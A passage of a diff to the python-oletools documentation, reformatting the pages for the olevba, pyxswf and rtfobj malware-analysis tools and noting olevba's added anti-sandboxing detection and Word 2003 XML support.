+for kw_type, keyword, description in results:
+
+    print &#39;type=%s - keyword=%s - description=%s&#39; % (kw_type, keyword, description)</code></pre>
+<p><strong>scan_summary</strong> returns a tuple with the number of items found for each category:</p>
+<p>(autoexec, suspicious, IOCs, hex, base64, dridex).</p>
+<h3 id="detect-auto-executable-macros-deprecated">Detect auto-executable macros (deprecated)</h3>
+<p><strong>Deprecated</strong>: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.</p>
+<p>The function <strong>detect_autoexec</strong> checks if VBA macro code contains specific macro names</p>
+<p>that will be triggered when the document/workbook is opened, closed, changed, etc.</p>
+<p>It returns a list of tuples containing two strings, the detected keyword, and the</p>
+<p>description of the trigger. (See the malware example above)</p>
+<p>Sample usage:</p>
+<pre><code>from oletools.olevba import detect_autoexec
+
+autoexec_keywords = detect_autoexec(vba_code)
+
+if autoexec_keywords:
+
+    print &#39;Auto-executable macro keywords found:&#39;
+
+    for keyword, description in autoexec_keywords:
+
+        print &#39;%s: %s&#39; % (keyword, description)
+
+else:
+
+    print &#39;Auto-executable macro keywords: None found&#39;</code></pre>
+<h3 id="detect-suspicious-vba-keywords-deprecated">Detect suspicious VBA keywords (deprecated)</h3>
+<p><strong>Deprecated</strong>: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.</p>
+<p>The function <strong>detect_suspicious</strong> checks if VBA macro code contains specific</p>
+<p>keywords often used by malware to act on the system (create files, run</p>
+<p>commands or applications, write to the registry, etc).</p>
+<p>It returns a list of tuples containing two strings, the detected keyword, and the</p>
+<p>description of the corresponding malicious behaviour. (See the malware example above)</p>
+<p>Sample usage:</p>
+<pre><code>from oletools.olevba import detect_suspicious
+
+suspicious_keywords = detect_suspicious(vba_code)
+
+if suspicious_keywords:
+
+    print &#39;Suspicious VBA keywords found:&#39;
+
+    for keyword, description in suspicious_keywords:
+
+        print &#39;%s: %s&#39; % (keyword, description)
+
+else:
+
+    print &#39;Suspicious VBA keywords: None found&#39;</code></pre>
+<h3 id="extract-potential-iocs-deprecated">Extract potential IOCs (deprecated)</h3>
+<p><strong>Deprecated</strong>: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.</p>
+<p>The function <strong>detect_patterns</strong> checks if VBA macro code contains specific</p>
+<p>patterns of interest, that may be useful for malware analysis and detection</p>
+<p>(potential Indicators of Compromise): IP addresses, e-mail addresses,</p>
+<p>URLs, executable file names.</p>
+<p>It returns a list of tuples containing two strings, the pattern type, and the</p>
+<p>extracted value. (See the malware example above)</p>
+<p>Sample usage:</p>
+<pre><code>from oletools.olevba import detect_patterns
+
+patterns = detect_patterns(vba_code)
+
+if patterns:
+
+    print &#39;Patterns found:&#39;
+
+    for pattern_type, value in patterns:
+
+        print &#39;%s: %s&#39; % (pattern_type, value)
+
+else:
+
+    print &#39;Patterns: None found&#39;</code></pre>
+<h3 id="close-the-vba_parser">Close the VBA_Parser</h3>
+<p>After usage, it is better to call the <strong>close</strong> method of the VBA_Parser object, to make sure the file is closed,</p>
+<p>especially if your application is parsing many files.</p>
+<pre><code>vba.close()</code></pre>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
@@ -4,8 +4,9 @@ olevba
 olevba is a script to parse OLE and OpenXML files such as MS Office documents
 (e.g. Word, Excel), to **detect VBA Macros**, extract their **source code** in clear text, 
 and detect security-related patterns such as **auto-executable macros**, **suspicious
-VBA keywords** used by malware, and potential **IOCs** (IP addresses, URLs, executable
-filenames, etc). It also detects and decodes several common **obfuscation methods including Hex encoding,
+VBA keywords** used by malware, anti-sandboxing and anti-virtualization techniques, 
+and potential **IOCs** (IP addresses, URLs, executable filenames, etc). 
+It also detects and decodes several common **obfuscation methods including Hex encoding,
 StrReverse, Base64, Dridex**, and extracts IOCs from decoded strings.
  
 It can be used either as a command-line tool, or as a python module from your own applications.
@@ -17,8 +18,11 @@ by John William Davison, with significant modifications.
  
 ## Supported formats
  
-- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
-- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+- Word 97-2003 (.doc, .dot)
+- Word 2007+ (.docm, .dotm)
+- Word 2003 XML (.xml)
+- Excel 97-2003 (.xls)
+- Excel 2007+ (.xlsm, .xlsb)
 - PowerPoint 2007+ (.pptm, .ppsm)
  
 ## Main Features
@@ -27,6 +31,7 @@ by John William Davison, with significant modifications.
 - Extract VBA macro source code
 - Detect auto-executable macros
 - Detect suspicious VBA keywords often used by malware
+- Detect anti-sandboxing and anti-virtualization techniques
 - Detect and decodes strings obfuscated with Hex/Base64/StrReverse/Dridex
 - Extract IOCs/patterns of interest such as IP addresses, URLs, e-mail addresses and executable file names
 - Scan multiple files and sample collections (wildcards, recursive)
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="pyxswf">pyxswf</h1>
-<p>pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.</p>
-<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
-<p>pyxswf is an extension to <a href="http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html">xxxswf.py</a> published by Alexander Hanel.</p>
-<p>Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on <a href="http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/">http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/</a></p>
-<p>It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).</p>
-<p>For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.</p>
-<h2 id="usage">Usage</h2>
-<pre><code>Usage: pyxswf.py [options] &lt;file.bad&gt;
-
-Options:
-  -o, --ole             Parse an OLE file (e.g. Word, Excel) to look for SWF
-                        in each stream
-  -f, --rtf             Parse an RTF file to look for SWF in each embedded
-                        object
-  -x, --extract         Extracts the embedded SWF(s), names it MD5HASH.swf &amp;
-                        saves it in the working dir. No addition args needed
-  -h, --help            show this help message and exit
-  -y, --yara            Scans the SWF(s) with yara. If the SWF(s) is
-                        compressed it will be deflated. No addition args
-                        needed
-  -s, --md5scan         Scans the SWF(s) for MD5 signatures. Please see func
-                        checkMD5 to define hashes. No addition args needed
-  -H, --header          Displays the SWFs file header. No addition args needed
-  -d, --decompress      Deflates compressed SWFS(s)
-  -r PATH, --recdir=PATH
-                        Will recursively scan a directory for files that
-                        contain SWFs. Must provide path in quotes
-  -c, --compress        Compresses the SWF using Zlib</code></pre>
-<h3 id="example-1---detecting-and-extracting-a-swf-file-from-a-word-document-on-windows">Example 1 - detecting and extracting a SWF file from a Word document on Windows:</h3>
-<pre><code>C:\oletools&gt;pyxswf.py -o word_flash.doc
-OLE stream: &#39;Contents&#39;
-[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
-        [ADDR] SWF 1 at 0x8  - FWS Header
-
-C:\oletools&gt;pyxswf.py -xo word_flash.doc
-OLE stream: &#39;Contents&#39;
-[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
-        [ADDR] SWF 1 at 0x8  - FWS Header
-                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
-<h3 id="example-2---detecting-and-extracting-a-swf-file-from-a-rtf-document-on-windows">Example 2 - detecting and extracting a SWF file from a RTF document on Windows:</h3>
-<pre><code>C:\oletools&gt;pyxswf.py -xf &quot;rtf_flash.rtf&quot;
-RTF embedded object size 1498557 at index 000036DD
-[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
-00036DD
-        [ADDR] SWF 1 at 0xc40  - FWS Header
-                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
-<h2 id="how-to-use-pyxswf-in-python-applications">How to use pyxswf in Python applications</h2>
-<p>TODO</p>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>pyxswf</p>
+<p>======</p>
+<p>pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may</p>
+<p>be embedded in files such as MS Office documents (e.g. Word, Excel),</p>
+<p>which is especially useful for malware analysis.</p>
+<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
+<p>pyxswf is an extension to <a href="http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html">xxxswf.py</a> published by Alexander Hanel.</p>
+<p>Compared to xxxswf, it can extract streams from MS Office documents by parsing</p>
+<p>their OLE structure properly, which is necessary when streams are fragmented.</p>
+<p>Stream fragmentation is a known obfuscation technique, as explained on</p>
+<p><a href="http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/">http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/</a></p>
+<p>It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).</p>
+<p>For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.</p>
+<h2 id="usage">Usage</h2>
+<pre><code>Usage: pyxswf.py [options] &lt;file.bad&gt;
+
+
+
+Options:
+
+  -o, --ole             Parse an OLE file (e.g. Word, Excel) to look for SWF
+
+                        in each stream
+
+  -f, --rtf             Parse an RTF file to look for SWF in each embedded
+
+                        object
+
+  -x, --extract         Extracts the embedded SWF(s), names it MD5HASH.swf &amp;
+
+                        saves it in the working dir. No addition args needed
+
+  -h, --help            show this help message and exit
+
+  -y, --yara            Scans the SWF(s) with yara. If the SWF(s) is
+
+                        compressed it will be deflated. No addition args
+
+                        needed
+
+  -s, --md5scan         Scans the SWF(s) for MD5 signatures. Please see func
+
+                        checkMD5 to define hashes. No addition args needed
+
+  -H, --header          Displays the SWFs file header. No addition args needed
+
+  -d, --decompress      Deflates compressed SWFS(s)
+
+  -r PATH, --recdir=PATH
+
+                        Will recursively scan a directory for files that
+
+                        contain SWFs. Must provide path in quotes
+
+  -c, --compress        Compresses the SWF using Zlib</code></pre>
+<h3 id="example-1---detecting-and-extracting-a-swf-file-from-a-word-document-on-windows">Example 1 - detecting and extracting a SWF file from a Word document on Windows:</h3>
+<pre><code>C:\oletools&gt;pyxswf.py -o word_flash.doc
+
+OLE stream: &#39;Contents&#39;
+
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+
+        [ADDR] SWF 1 at 0x8  - FWS Header
+
+
+
+C:\oletools&gt;pyxswf.py -xo word_flash.doc
+
+OLE stream: &#39;Contents&#39;
+
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+
+        [ADDR] SWF 1 at 0x8  - FWS Header
+
+                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
+<h3 id="example-2---detecting-and-extracting-a-swf-file-from-a-rtf-document-on-windows">Example 2 - detecting and extracting a SWF file from a RTF document on Windows:</h3>
+<pre><code>C:\oletools&gt;pyxswf.py -xf &quot;rtf_flash.rtf&quot;
+
+RTF embedded object size 1498557 at index 000036DD
+
+[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
+
+00036DD
+
+        [ADDR] SWF 1 at 0xc40  - FWS Header
+
+                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
+<h2 id="how-to-use-pyxswf-in-python-applications">How to use pyxswf in Python applications</h2>
+<p>TODO</p>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="rtfobj">rtfobj</h1>
-<p>rtfobj is a Python module to extract embedded objects from RTF files, such as OLE ojects. It can be used as a Python library or a command-line tool.</p>
-<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
-<h2 id="usage">Usage</h2>
-<pre><code>rtfobj.py &lt;file.rtf&gt;</code></pre>
-<p>It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named &quot;object_xxxx.bin&quot;, xxxx being the location of the object in the RTF file.</p>
-<h2 id="how-to-use-rtfobj-in-python-applications">How to use rtfobj in Python applications</h2>
-<p>Usage as a python module:</p>
-<p>rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.</p>
-<p>Example:</p>
-<pre><code>import rtfobj    
-for index, data in rtfobj.rtf_iter_objects(&quot;myfile.rtf&quot;):
-    print &#39;found object size %d at index %08X&#39; % (len(data), index)</code></pre>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>rtfobj</p>
+<p>======</p>
+<p>rtfobj is a Python module to extract embedded objects from RTF files, such as</p>
+<p>OLE ojects. It can be used as a Python library or a command-line tool.</p>
+<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
+<h2 id="usage">Usage</h2>
+<pre><code>rtfobj.py &lt;file.rtf&gt;</code></pre>
+<p>It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named &quot;object_xxxx.bin&quot;, xxxx being the location of the object in the RTF file.</p>
+<h2 id="how-to-use-rtfobj-in-python-applications">How to use rtfobj in Python applications</h2>
+<p>Usage as a python module:</p>
+<p>rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.</p>
+<p>Example:</p>
+<pre><code>import rtfobj    
+
+for index, data in rtfobj.rtf_iter_objects(&quot;myfile.rtf&quot;):
+
+    print &#39;found object size %d at index %08X&#39; % (len(data), index)</code></pre>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>